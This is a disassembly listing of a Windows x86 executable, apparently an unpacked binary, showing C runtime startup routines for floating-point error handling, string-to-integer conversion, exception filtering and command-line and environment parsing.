loc_40A66A: ; CODE XREF: sub_40A42B+22D�j
; sub_40A42B+236�j
fld qword ptr [edi]
fmul [ebp+var_8]
fst qword ptr [esi]
fld qword ptr [edi]
fstp [ebp+var_20]
fld qword ptr [ebx]
fstp [ebp+var_18]
loc_40A67B: ; CODE XREF: sub_40A42B+129�j
lea ecx, [ebp+var_28]
fstp [ebp+var_10]
push ecx
mov [ebp+var_28], 1
call eax
test eax, eax
pop ecx
jnz short loc_40A69B
call sub_4057D3
mov dword ptr [eax], 21h
loc_40A69B: ; CODE XREF: sub_40A42B+C7�j
; sub_40A42B+D8�j ...
fld [ebp+var_10]
loc_40A69E: ; CODE XREF: sub_40A42B+1B3�j
fstp qword ptr [esi]
loc_40A6A0: ; CODE XREF: sub_40A42B+9B�j
; sub_40A42B+174�j ...
pop edi ; default
pop esi
pop ebx
leave
retn
sub_40A42B endp
; ---------------------------------------------------------------------------
db 8Bh, 0FFh
off_40A6A7 dd offset loc_40A60C ; DATA XREF: sub_40A42B+1DA�r
dd offset loc_40A615 ; jump table for switch statement
dd offset loc_40A61E
dd offset loc_40A627
dd offset loc_40A630
dd offset loc_40A639
dd offset loc_40A5C4
dd offset loc_40A645
dd offset loc_40A5AE
dd offset loc_40A5A5
dd offset loc_40A651
dd offset loc_40A65A
dd offset loc_40A663
; =============== S U B R O U T I N E =======================================
sub_40A6DB proc near ; DATA XREF: .rdata:0041D2CC�o
and dword_433C78, 0
call sub_40F7D9
mov dword_433C78, eax
xor eax, eax
retn
sub_40A6DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40A6EF(double)
sub_40A6EF proc near ; CODE XREF: sub_403DA0+7�j
; sub_403DA0+38�j
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_423DB8
call sub_41005D
fld [ebp+arg_0]
pop ecx
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
push ecx
and ax, 7FF0h
cmp ax, 7FF0h
push ecx
fstp [esp+18h+var_18]
jnz short loc_40A775
call sub_40FF3C
test eax, eax
pop ecx
pop ecx
jle short loc_40A758
cmp eax, 2
jle short loc_40A74A
cmp eax, 3
jnz short loc_40A758
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Ch ; int
call sub_40FDF4
add esp, 10h
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A74A: ; CODE XREF: sub_40A6EF+3F�j
push esi
push ebx
call sub_41005D
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A758: ; CODE XREF: sub_40A6EF+3A�j
; sub_40A6EF+44�j
fld [ebp+arg_0]
push ebx
fadd ds:dbl_41DBF0
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_40A7B4
; ---------------------------------------------------------------------------
loc_40A775: ; CODE XREF: sub_40A6EF+2F�j
call sub_40FF01
fstp [ebp+var_8]
fld [ebp+arg_0]
pop ecx
fcomp [ebp+var_8]
pop ecx
fnstsw ax
test ah, 44h
jp short loc_40A79A
loc_40A78C: ; CODE XREF: sub_40A6EF+AE�j
push esi
push ebx
call sub_41005D
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_40A7BC
; ---------------------------------------------------------------------------
loc_40A79A: ; CODE XREF: sub_40A6EF+9B�j
test bl, 20h
jnz short loc_40A78C
fld [ebp+var_8]
push ebx ; int
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_40A7B4: ; CODE XREF: sub_40A6EF+84�j
call sub_40FE47
add esp, 1Ch
loc_40A7BC: ; CODE XREF: sub_40A6EF+59�j
; sub_40A6EF+67�j ...
pop esi
pop ebx
leave
retn
sub_40A6EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A7C0 proc near ; CODE XREF: sub_40A9EB:loc_40AA0A�p
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
push [ebp+arg_0]
lea ecx, [ebp+var_14]
call sub_40271F
mov eax, [ebp+arg_8]
mov esi, [ebp+arg_4]
xor edi, edi
cmp eax, edi
jz short loc_40A7E1
mov [eax], esi
loc_40A7E1: ; CODE XREF: sub_40A7C0+1D�j
cmp esi, edi
jnz short loc_40A811
loc_40A7E5: ; CODE XREF: sub_40A7C0+5A�j
; sub_40A7C0+60�j
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_40A80A
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A80A: ; CODE XREF: sub_40A7C0+41�j
xor eax, eax
jmp loc_40A9E7
; ---------------------------------------------------------------------------
loc_40A811: ; CODE XREF: sub_40A7C0+23�j
cmp [ebp+arg_C], edi
jz short loc_40A822
cmp [ebp+arg_C], 2
jl short loc_40A7E5
cmp [ebp+arg_C], 24h
jg short loc_40A7E5
loc_40A822: ; CODE XREF: sub_40A7C0+54�j
mov ecx, [ebp+var_14]
push ebx
mov bl, [esi]
mov [ebp+var_4], edi
lea edi, [esi+1]
loc_40A82E: ; CODE XREF: sub_40A7C0+A5�j
cmp dword ptr [ecx+0ACh], 1
jle short loc_40A84E
lea eax, [ebp+var_14]
push eax
movzx eax, bl
push 8
push eax
call sub_40CA44
mov ecx, [ebp+var_14]
add esp, 0Ch
jmp short loc_40A85E
; ---------------------------------------------------------------------------
loc_40A84E: ; CODE XREF: sub_40A7C0+75�j
mov edx, [ecx+0C8h]
movzx eax, bl
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_40A85E: ; CODE XREF: sub_40A7C0+8C�j
test eax, eax
jz short loc_40A867
mov bl, [edi]
inc edi
jmp short loc_40A82E
; ---------------------------------------------------------------------------
loc_40A867: ; CODE XREF: sub_40A7C0+A0�j
cmp bl, 2Dh
jnz short loc_40A872
or [ebp+arg_10], 2
jmp short loc_40A877
; ---------------------------------------------------------------------------
loc_40A872: ; CODE XREF: sub_40A7C0+AA�j
cmp bl, 2Bh
jnz short loc_40A87A
loc_40A877: ; CODE XREF: sub_40A7C0+B0�j
mov bl, [edi]
inc edi
loc_40A87A: ; CODE XREF: sub_40A7C0+B5�j
mov eax, [ebp+arg_C]
test eax, eax
jl loc_40A9CE
cmp eax, 1
jz loc_40A9CE
cmp eax, 24h
jg loc_40A9CE
test eax, eax
jnz short loc_40A8C5
cmp bl, 30h
jz short loc_40A8A9
mov [ebp+arg_C], 0Ah
jmp short loc_40A8DD
; ---------------------------------------------------------------------------
loc_40A8A9: ; CODE XREF: sub_40A7C0+DE�j
mov al, [edi]
cmp al, 78h
jz short loc_40A8BC
cmp al, 58h
jz short loc_40A8BC
mov [ebp+arg_C], 8
jmp short loc_40A8DD
; ---------------------------------------------------------------------------
loc_40A8BC: ; CODE XREF: sub_40A7C0+ED�j
; sub_40A7C0+F1�j
mov [ebp+arg_C], 10h
jmp short loc_40A8CF
; ---------------------------------------------------------------------------
loc_40A8C5: ; CODE XREF: sub_40A7C0+D9�j
cmp eax, 10h
jnz short loc_40A8DD
cmp bl, 30h
jnz short loc_40A8DD
loc_40A8CF: ; CODE XREF: sub_40A7C0+103�j
mov al, [edi]
cmp al, 78h
jz short loc_40A8D9
cmp al, 58h
jnz short loc_40A8DD
loc_40A8D9: ; CODE XREF: sub_40A7C0+113�j
inc edi
mov bl, [edi]
inc edi
loc_40A8DD: ; CODE XREF: sub_40A7C0+E7�j
; sub_40A7C0+FA�j ...
mov esi, [ecx+0C8h]
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_C]
loc_40A8EB: ; CODE XREF: sub_40A7C0+19D�j
movzx ecx, bl
movzx ecx, word ptr [esi+ecx*2]
test cl, 4
jz short loc_40A8FF
movsx ecx, bl
sub ecx, 30h
jmp short loc_40A919
; ---------------------------------------------------------------------------
loc_40A8FF: ; CODE XREF: sub_40A7C0+135�j
test cx, 103h
jz short loc_40A937
mov cl, bl
sub cl, 61h
cmp cl, 19h
movsx ecx, bl
ja short loc_40A916
sub ecx, 20h
loc_40A916: ; CODE XREF: sub_40A7C0+151�j
add ecx, 0FFFFFFC9h
loc_40A919: ; CODE XREF: sub_40A7C0+13D�j
cmp ecx, [ebp+arg_C]
jnb short loc_40A937
or [ebp+arg_10], 8
cmp [ebp+var_4], eax
jb short loc_40A94E
jnz short loc_40A92D
cmp ecx, edx
jbe short loc_40A94E
loc_40A92D: ; CODE XREF: sub_40A7C0+167�j
or [ebp+arg_10], 4
cmp [ebp+arg_8], 0
jnz short loc_40A95A
loc_40A937: ; CODE XREF: sub_40A7C0+144�j
; sub_40A7C0+15C�j
mov eax, [ebp+arg_10]
dec edi
test al, 8
jnz short loc_40A95F
cmp [ebp+arg_8], 0
jz short loc_40A948
mov edi, [ebp+arg_4]
loc_40A948: ; CODE XREF: sub_40A7C0+183�j
and [ebp+var_4], 0
jmp short loc_40A9AA
; ---------------------------------------------------------------------------
loc_40A94E: ; CODE XREF: sub_40A7C0+165�j
; sub_40A7C0+16B�j
mov ebx, [ebp+var_4]
imul ebx, [ebp+arg_C]
add ebx, ecx
mov [ebp+var_4], ebx
loc_40A95A: ; CODE XREF: sub_40A7C0+175�j
mov bl, [edi]
inc edi
jmp short loc_40A8EB
; ---------------------------------------------------------------------------
loc_40A95F: ; CODE XREF: sub_40A7C0+17D�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_40A983
test al, 1
jnz short loc_40A9AA
and eax, 2
jz short loc_40A97A
cmp [ebp+var_4], 80000000h
ja short loc_40A983
loc_40A97A: ; CODE XREF: sub_40A7C0+1AF�j
test eax, eax
jnz short loc_40A9AA
cmp [ebp+var_4], esi
jbe short loc_40A9AA
loc_40A983: ; CODE XREF: sub_40A7C0+1A6�j
; sub_40A7C0+1B8�j
call sub_4057D3
test byte ptr [ebp+arg_10], 1
mov dword ptr [eax], 22h
jz short loc_40A99A
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40A9AA
; ---------------------------------------------------------------------------
loc_40A99A: ; CODE XREF: sub_40A7C0+1D2�j
mov al, byte ptr [ebp+arg_10]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_40A9AA: ; CODE XREF: sub_40A7C0+18C�j
; sub_40A7C0+1AA�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40A9B3
mov [eax], edi
loc_40A9B3: ; CODE XREF: sub_40A7C0+1EF�j
test byte ptr [ebp+arg_10], 2
jz short loc_40A9BC
neg [ebp+var_4]
loc_40A9BC: ; CODE XREF: sub_40A7C0+1F7�j
cmp [ebp+var_8], 0
jz short loc_40A9C9
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A9C9: ; CODE XREF: sub_40A7C0+200�j
mov eax, [ebp+var_4]
jmp short loc_40A9E6
; ---------------------------------------------------------------------------
loc_40A9CE: ; CODE XREF: sub_40A7C0+BF�j
; sub_40A7C0+C8�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40A9D7
mov [eax], esi
loc_40A9D7: ; CODE XREF: sub_40A7C0+213�j
cmp [ebp+var_8], 0
jz short loc_40A9E4
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A9E4: ; CODE XREF: sub_40A7C0+21B�j
xor eax, eax
loc_40A9E6: ; CODE XREF: sub_40A7C0+20C�j
pop ebx
loc_40A9E7: ; CODE XREF: sub_40A7C0+4C�j
pop edi
pop esi
leave
retn
sub_40A7C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9EB proc near ; CODE XREF: sub_403EBD+8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
xor eax, eax
cmp dword_425DE0, eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_40AA09
push offset off_423680
jmp short loc_40AA0A
; ---------------------------------------------------------------------------
loc_40AA09: ; CODE XREF: sub_40A9EB+15�j
push eax
loc_40AA0A: ; CODE XREF: sub_40A9EB+1C�j
call sub_40A7C0
add esp, 14h
pop ebp
retn
sub_40A9EB endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA15 proc near ; CODE XREF: .text:004040D1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
call sub_40531A
mov esi, eax
test esi, esi
jnz short loc_40AA34
push [ebp+arg_4]
call ds:dword_41D198 ; UnhandledExceptionFilter
jmp loc_40AB81
; ---------------------------------------------------------------------------
loc_40AA34: ; CODE XREF: sub_40AA15+F�j
mov edx, [esi+5Ch]
mov eax, dword_423E44
push edi
mov edi, [ebp+arg_0]
mov ecx, edx
push ebx
loc_40AA43: ; CODE XREF: sub_40AA15+3E�j
cmp [ecx], edi
jz short loc_40AA55
mov ebx, eax
imul ebx, 0Ch
add ecx, 0Ch
add ebx, edx
cmp ecx, ebx
jb short loc_40AA43
loc_40AA55: ; CODE XREF: sub_40AA15+30�j
imul eax, 0Ch
add eax, edx
cmp ecx, eax
jnb short loc_40AA66
cmp [ecx], edi
jnz short loc_40AA66
mov eax, ecx
jmp short loc_40AA68
; ---------------------------------------------------------------------------
loc_40AA66: ; CODE XREF: sub_40AA15+47�j
; sub_40AA15+4B�j
xor eax, eax
loc_40AA68: ; CODE XREF: sub_40AA15+4F�j
test eax, eax
jz short loc_40AA76
mov ebx, [eax+8]
test ebx, ebx
mov [ebp+var_4], ebx
jnz short loc_40AA84
loc_40AA76: ; CODE XREF: sub_40AA15+55�j
push [ebp+arg_4]
call ds:dword_41D198 ; UnhandledExceptionFilter
jmp loc_40AB7F
; ---------------------------------------------------------------------------
loc_40AA84: ; CODE XREF: sub_40AA15+5F�j
cmp ebx, 5
jnz short loc_40AA95
and dword ptr [eax+8], 0
xor eax, eax
inc eax
jmp loc_40AB7F
; ---------------------------------------------------------------------------
loc_40AA95: ; CODE XREF: sub_40AA15+72�j
cmp ebx, 1
jz loc_40AB7C
mov ecx, [esi+60h]
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_4]
mov [esi+60h], ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_40AB6E
mov ecx, dword_423E38
mov edi, dword_423E3C
mov edx, ecx
add edi, ecx
cmp edx, edi
jge short loc_40AAEE
imul ecx, 0Ch
loc_40AACD: ; CODE XREF: sub_40AA15+D4�j
mov edi, [esi+5Ch]
and dword ptr [ecx+edi+8], 0
mov edi, dword_423E38
mov ebx, dword_423E3C
inc edx
add ebx, edi
add ecx, 0Ch
cmp edx, ebx
jl short loc_40AACD
mov ebx, [ebp+var_4]
loc_40AAEE: ; CODE XREF: sub_40AA15+B3�j
mov eax, [eax]
cmp eax, 0C000008Eh
mov edi, [esi+64h]
jnz short loc_40AB03
mov dword ptr [esi+64h], 83h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB03: ; CODE XREF: sub_40AA15+E3�j
cmp eax, 0C0000090h
jnz short loc_40AB13
mov dword ptr [esi+64h], 81h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB13: ; CODE XREF: sub_40AA15+F3�j
cmp eax, 0C0000091h
jnz short loc_40AB23
mov dword ptr [esi+64h], 84h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB23: ; CODE XREF: sub_40AA15+103�j
cmp eax, 0C0000093h
jnz short loc_40AB33
mov dword ptr [esi+64h], 85h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB33: ; CODE XREF: sub_40AA15+113�j
cmp eax, 0C000008Dh
jnz short loc_40AB43
mov dword ptr [esi+64h], 82h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB43: ; CODE XREF: sub_40AA15+123�j
cmp eax, 0C000008Fh
jnz short loc_40AB53
mov dword ptr [esi+64h], 86h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB53: ; CODE XREF: sub_40AA15+133�j
cmp eax, 0C0000092h
jnz short loc_40AB61
mov dword ptr [esi+64h], 8Ah
loc_40AB61: ; CODE XREF: sub_40AA15+EC�j
; sub_40AA15+FC�j ...
push dword ptr [esi+64h]
push 8
call ebx
pop ecx
mov [esi+64h], edi
jmp short loc_40AB75
; ---------------------------------------------------------------------------
loc_40AB6E: ; CODE XREF: sub_40AA15+9B�j
and dword ptr [eax+8], 0
push ecx
call ebx
loc_40AB75: ; CODE XREF: sub_40AA15+157�j
mov eax, [ebp+var_8]
pop ecx
mov [esi+60h], eax
loc_40AB7C: ; CODE XREF: sub_40AA15+83�j
or eax, 0FFFFFFFFh
loc_40AB7F: ; CODE XREF: sub_40AA15+6A�j
; sub_40AA15+7B�j
pop ebx
pop edi
loc_40AB81: ; CODE XREF: sub_40AA15+1A�j
pop esi
leave
retn
sub_40AA15 endp
; =============== S U B R O U T I N E =======================================
sub_40AB84 proc near ; CODE XREF: .text:loc_40408E�p
push esi
push edi
xor edi, edi
cmp dword_434DD4, edi
jnz short loc_40AB95
call sub_404E03
loc_40AB95: ; CODE XREF: sub_40AB84+A�j
mov esi, dword_434DF8
test esi, esi
jnz short loc_40ABA4
mov esi, offset word_41D482
loc_40ABA4: ; CODE XREF: sub_40AB84+19�j
; sub_40AB84+4B�j
mov al, [esi]
cmp al, 20h
ja short loc_40ABB2
test al, al
jz short loc_40ABDC
test edi, edi
jz short loc_40ABD6
loc_40ABB2: ; CODE XREF: sub_40AB84+24�j
cmp al, 22h
jnz short loc_40ABBF
xor ecx, ecx
test edi, edi
setz cl
mov edi, ecx
loc_40ABBF: ; CODE XREF: sub_40AB84+30�j
movzx eax, al
push eax
call sub_41019D
test eax, eax
pop ecx
jz short loc_40ABCE
inc esi
loc_40ABCE: ; CODE XREF: sub_40AB84+47�j
inc esi
jmp short loc_40ABA4
; ---------------------------------------------------------------------------
loc_40ABD1: ; CODE XREF: sub_40AB84+56�j
cmp al, 20h
ja short loc_40ABDC
inc esi
loc_40ABD6: ; CODE XREF: sub_40AB84+2C�j
mov al, [esi]
test al, al
jnz short loc_40ABD1
loc_40ABDC: ; CODE XREF: sub_40AB84+28�j
; sub_40AB84+4F�j
pop edi
mov eax, esi
pop esi
retn
sub_40AB84 endp
; =============== S U B R O U T I N E =======================================
sub_40ABE1 proc near ; CODE XREF: .text:loc_40406B�p
push ebx
xor ebx, ebx
cmp dword_434DD4, ebx
push esi
push edi
jnz short loc_40ABF3
call sub_404E03
loc_40ABF3: ; CODE XREF: sub_40ABE1+B�j
mov esi, dword_425A94
xor edi, edi
cmp esi, ebx
jnz short loc_40AC17
loc_40ABFF: ; CODE XREF: sub_40ABE1+51�j
or eax, 0FFFFFFFFh
jmp loc_40ACA2
; ---------------------------------------------------------------------------
loc_40AC07: ; CODE XREF: sub_40ABE1+3A�j
cmp al, 3Dh
jz short loc_40AC0C
inc edi
loc_40AC0C: ; CODE XREF: sub_40ABE1+28�j
push esi
call sub_404130
pop ecx
lea esi, [esi+eax+1]
loc_40AC17: ; CODE XREF: sub_40ABE1+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_40AC07
push 4
inc edi
push edi
call sub_40777A
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
mov dword_425F98, edi
jz short loc_40ABFF
mov esi, dword_425A94
push ebp
jmp short loc_40AC7D
; ---------------------------------------------------------------------------
loc_40AC3D: ; CODE XREF: sub_40ABE1+9E�j
push esi
call sub_404130
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_40AC7B
push 1
push ebp
call sub_40777A
cmp eax, ebx
pop ecx
pop ecx
mov [edi], eax
jz short loc_40ACA6
push esi
push ebp
push eax
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_40AC78
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40AC78: ; CODE XREF: sub_40ABE1+88�j
add edi, 4
loc_40AC7B: ; CODE XREF: sub_40ABE1+69�j
add esi, ebp
loc_40AC7D: ; CODE XREF: sub_40ABE1+5A�j
cmp [esi], bl
jnz short loc_40AC3D
push dword_425A94
call sub_403603
mov dword_425A94, ebx
mov [edi], ebx
mov dword_434DC8, 1
xor eax, eax
loc_40ACA0: ; CODE XREF: sub_40ABE1+D9�j
pop ecx
pop ebp
loc_40ACA2: ; CODE XREF: sub_40ABE1+21�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40ACA6: ; CODE XREF: sub_40ABE1+79�j
push dword_425F98
call sub_403603
mov dword_425F98, ebx
or eax, 0FFFFFFFFh
jmp short loc_40ACA0
sub_40ABE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ACBC proc near ; CODE XREF: sub_40AE54+55�p
; sub_40AE54+96�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_8]
push ebx
xor eax, eax
cmp [ebp+arg_0], eax
push esi
mov [edi], eax
mov esi, edx
mov edx, [ebp+arg_4]
mov dword ptr [ecx], 1
jz short loc_40ACE2
mov ebx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ebx], edx
loc_40ACE2: ; CODE XREF: sub_40ACBC+1B�j
mov [ebp+var_4], eax
loc_40ACE5: ; CODE XREF: sub_40ACBC+7E�j
; sub_40ACBC+88�j
cmp byte ptr [esi], 22h
jnz short loc_40ACFA
xor eax, eax
cmp [ebp+var_4], eax
mov bl, 22h
setz al
inc esi
mov [ebp+var_4], eax
jmp short loc_40AD36
; ---------------------------------------------------------------------------
loc_40ACFA: ; CODE XREF: sub_40ACBC+2C�j
inc dword ptr [edi]
test edx, edx
jz short loc_40AD08
mov al, [esi]
mov [edx], al
inc edx
mov [ebp+arg_4], edx
loc_40AD08: ; CODE XREF: sub_40ACBC+42�j
mov bl, [esi]
movzx eax, bl
push eax
inc esi
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AD2C
inc dword ptr [edi]
cmp [ebp+arg_4], 0
jz short loc_40AD2B
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
loc_40AD2B: ; CODE XREF: sub_40ACBC+63�j
inc esi
loc_40AD2C: ; CODE XREF: sub_40ACBC+5B�j
test bl, bl
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
jz short loc_40AD68
loc_40AD36: ; CODE XREF: sub_40ACBC+3C�j
cmp [ebp+var_4], 0
jnz short loc_40ACE5
cmp bl, 20h
jz short loc_40AD46
cmp bl, 9
jnz short loc_40ACE5
loc_40AD46: ; CODE XREF: sub_40ACBC+83�j
test edx, edx
jz short loc_40AD4E
mov byte ptr [edx-1], 0
loc_40AD4E: ; CODE XREF: sub_40ACBC+8C�j
; sub_40ACBC+AD�j
and [ebp+var_4], 0
loc_40AD52: ; CODE XREF: sub_40ACBC+183�j
cmp byte ptr [esi], 0
jz loc_40AE44
loc_40AD5B: ; CODE XREF: sub_40ACBC+AA�j
mov al, [esi]
cmp al, 20h
jz short loc_40AD65
cmp al, 9
jnz short loc_40AD6B
loc_40AD65: ; CODE XREF: sub_40ACBC+A3�j
inc esi
jmp short loc_40AD5B
; ---------------------------------------------------------------------------
loc_40AD68: ; CODE XREF: sub_40ACBC+78�j
dec esi
jmp short loc_40AD4E
; ---------------------------------------------------------------------------
loc_40AD6B: ; CODE XREF: sub_40ACBC+A7�j
cmp byte ptr [esi], 0
jz loc_40AE44
cmp [ebp+arg_0], 0
jz short loc_40AD83
mov eax, [ebp+arg_0]
add [ebp+arg_0], 4
mov [eax], edx
loc_40AD83: ; CODE XREF: sub_40ACBC+BC�j
inc dword ptr [ecx]
loc_40AD85: ; CODE XREF: sub_40ACBC+16E�j
xor ebx, ebx
inc ebx
xor ecx, ecx
jmp short loc_40AD8E
; ---------------------------------------------------------------------------
loc_40AD8C: ; CODE XREF: sub_40ACBC+D5�j
inc esi
inc ecx
loc_40AD8E: ; CODE XREF: sub_40ACBC+CE�j
cmp byte ptr [esi], 5Ch
jz short loc_40AD8C
cmp byte ptr [esi], 22h
jnz short loc_40ADBE
test cl, 1
jnz short loc_40ADBC
cmp [ebp+var_4], 0
jz short loc_40ADAF
lea eax, [esi+1]
cmp byte ptr [eax], 22h
jnz short loc_40ADAF
mov esi, eax
jmp short loc_40ADBC
; ---------------------------------------------------------------------------
loc_40ADAF: ; CODE XREF: sub_40ACBC+E5�j
; sub_40ACBC+ED�j
xor eax, eax
xor ebx, ebx
cmp [ebp+var_4], eax
setz al
mov [ebp+var_4], eax
loc_40ADBC: ; CODE XREF: sub_40ACBC+DF�j
; sub_40ACBC+F1�j
shr ecx, 1
loc_40ADBE: ; CODE XREF: sub_40ACBC+DA�j
test ecx, ecx
jz short loc_40ADD4
loc_40ADC2: ; CODE XREF: sub_40ACBC+113�j
dec ecx
test edx, edx
jz short loc_40ADCB
mov byte ptr [edx], 5Ch
inc edx
loc_40ADCB: ; CODE XREF: sub_40ACBC+109�j
inc dword ptr [edi]
test ecx, ecx
jnz short loc_40ADC2
mov [ebp+arg_4], edx
loc_40ADD4: ; CODE XREF: sub_40ACBC+104�j
mov al, [esi]
test al, al
jz short loc_40AE2F
cmp [ebp+var_4], 0
jnz short loc_40ADE8
cmp al, 20h
jz short loc_40AE2F
cmp al, 9
jz short loc_40AE2F
loc_40ADE8: ; CODE XREF: sub_40ACBC+122�j
test ebx, ebx
jz short loc_40AE29
test edx, edx
movsx eax, al
push eax
jz short loc_40AE17
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AE0B
mov al, [esi]
mov ecx, [ebp+arg_4]
inc [ebp+arg_4]
mov [ecx], al
inc esi
inc dword ptr [edi]
loc_40AE0B: ; CODE XREF: sub_40ACBC+140�j
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
jmp short loc_40AE24
; ---------------------------------------------------------------------------
loc_40AE17: ; CODE XREF: sub_40ACBC+136�j
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AE24
inc esi
inc dword ptr [edi]
loc_40AE24: ; CODE XREF: sub_40ACBC+159�j
; sub_40ACBC+163�j
inc dword ptr [edi]
mov edx, [ebp+arg_4]
loc_40AE29: ; CODE XREF: sub_40ACBC+12E�j
inc esi
jmp loc_40AD85
; ---------------------------------------------------------------------------
loc_40AE2F: ; CODE XREF: sub_40ACBC+11C�j
; sub_40ACBC+126�j ...
test edx, edx
jz short loc_40AE3A
mov byte ptr [edx], 0
inc edx
mov [ebp+arg_4], edx
loc_40AE3A: ; CODE XREF: sub_40ACBC+175�j
inc dword ptr [edi]
mov ecx, [ebp+arg_8]
jmp loc_40AD52
; ---------------------------------------------------------------------------
loc_40AE44: ; CODE XREF: sub_40ACBC+99�j
; sub_40ACBC+B2�j
mov eax, [ebp+arg_0]
test eax, eax
pop esi
pop ebx
jz short loc_40AE50
and dword ptr [eax], 0
loc_40AE50: ; CODE XREF: sub_40ACBC+18F�j
inc dword ptr [ecx]
leave
retn
sub_40ACBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE54 proc near ; CODE XREF: .text:0040405A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
xor ebx, ebx
cmp dword_434DD4, ebx
push esi
push edi
jnz short loc_40AE6C
call sub_404E03
loc_40AE6C: ; CODE XREF: sub_40AE54+11�j
push 104h
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push esi
push ebx
mov byte_4263FC, bl
call ds:dword_41D060 ; GetModuleFileNameA
mov eax, dword_434DF8
cmp eax, ebx
mov off_425FA8, esi
jz short loc_40AE9A
cmp [eax], bl
mov [ebp+var_4], eax
jnz short loc_40AE9D
loc_40AE9A: ; CODE XREF: sub_40AE54+3D�j
mov [ebp+var_4], esi
loc_40AE9D: ; CODE XREF: sub_40AE54+44�j
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
lea edi, [ebp+var_C]
call sub_40ACBC
mov eax, [ebp+var_8]
add esp, 0Ch
cmp eax, 3FFFFFFFh
jnb short loc_40AF05
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnb short loc_40AF05
mov edi, eax
shl edi, 2
lea eax, [edi+ecx]
cmp eax, ecx
jb short loc_40AF05
push eax
call sub_40773A
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_40AF05
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
add edi, esi
push edi
push esi
lea edi, [ebp+var_C]
call sub_40ACBC
mov eax, [ebp+var_8]
add esp, 0Ch
dec eax
mov dword_425F8C, eax
mov dword_425F90, esi
xor eax, eax
jmp short loc_40AF08
; ---------------------------------------------------------------------------
